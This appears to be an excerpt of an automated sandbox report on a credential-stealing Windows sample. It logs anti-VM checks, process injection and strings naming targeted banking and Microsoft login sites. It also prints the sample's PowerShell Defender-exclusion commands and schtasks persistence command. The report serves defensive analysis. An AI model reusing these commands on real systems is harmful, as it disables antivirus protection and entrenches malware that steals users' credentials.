                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: RgIbrhxoEx.exe PID: 5440, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: LjGABleGAy.exe PID: 1880, type: MEMORYSTR
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory allocated: F90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory allocated: 2DA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory allocated: 12D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory allocated: 6110000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory allocated: 5FA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory allocated: 7210000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory allocated: 8210000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory allocated: 13C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory allocated: 30B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory allocated: 50B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMemory allocated: 1380000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMemory allocated: 31E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMemory allocated: 3000000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMemory allocated: 63A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMemory allocated: 73A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMemory allocated: 75E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMemory allocated: 85E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMemory allocated: 12D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMemory allocated: 2C90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMemory allocated: 4C90000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6201Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7727Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 363Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWindow / User API: threadDelayed 2865Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWindow / User API: threadDelayed 4936Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWindow / User API: threadDelayed 1869
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWindow / User API: threadDelayed 5751
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe TID: 2164Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3788Thread sleep count: 6201 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4744Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1216Thread sleep count: 145 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3552Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6448Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6388Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe TID: 7396Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe TID: 3812Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe TID: 1272Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe TID: 7196Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe TID: 7740Thread sleep time: -23058430092136925s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe TID: 7536Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe TID: 7508Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULLJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior
                    Source: tmp4D8.tmp.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: tmp4D8.tmp.8.drBinary or memory string: discord.comVMware20,11696428655f
                    Source: tmp4D8.tmp.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: tmp4D8.tmp.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: tmp4D8.tmp.8.drBinary or memory string: global block list test formVMware20,11696428655
                    Source: tmp4D8.tmp.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: tmp4D8.tmp.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: tmp4D8.tmp.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: tmp4D8.tmp.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: tmp4D8.tmp.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: tmp4D8.tmp.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: tmp4D8.tmp.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: tmp4D8.tmp.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: tmp4D8.tmp.8.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: tmp4D8.tmp.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2243746245.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2326375186.0000000000E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: tmp4D8.tmp.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: tmp4D8.tmp.8.drBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: tmp4D8.tmp.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: tmp4D8.tmp.8.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: tmp4D8.tmp.8.drBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: tmp4D8.tmp.8.drBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: tmp4D8.tmp.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: tmp4D8.tmp.8.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: tmp4D8.tmp.8.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: tmp4D8.tmp.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: tmp4D8.tmp.8.drBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: tmp4D8.tmp.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: tmp4D8.tmp.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: tmp4D8.tmp.8.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: LjGABleGAy.exe, 0000000A.00000002.2215810861.00000000014A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}v
                    Source: tmp4D8.tmp.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: tmp4D8.tmp.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe"
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LjGABleGAy.exe"
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LjGABleGAy.exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeMemory written: C:\Users\user\Desktop\RgIbrhxoEx.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMemory written: C:\Users\user\AppData\Roaming\LjGABleGAy.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LjGABleGAy.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess created: C:\Users\user\Desktop\RgIbrhxoEx.exe "C:\Users\user\Desktop\RgIbrhxoEx.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp5E88.tmp"
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess created: C:\Users\user\AppData\Roaming\LjGABleGAy.exe "C:\Users\user\AppData\Roaming\LjGABleGAy.exe"
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Users\user\Desktop\RgIbrhxoEx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
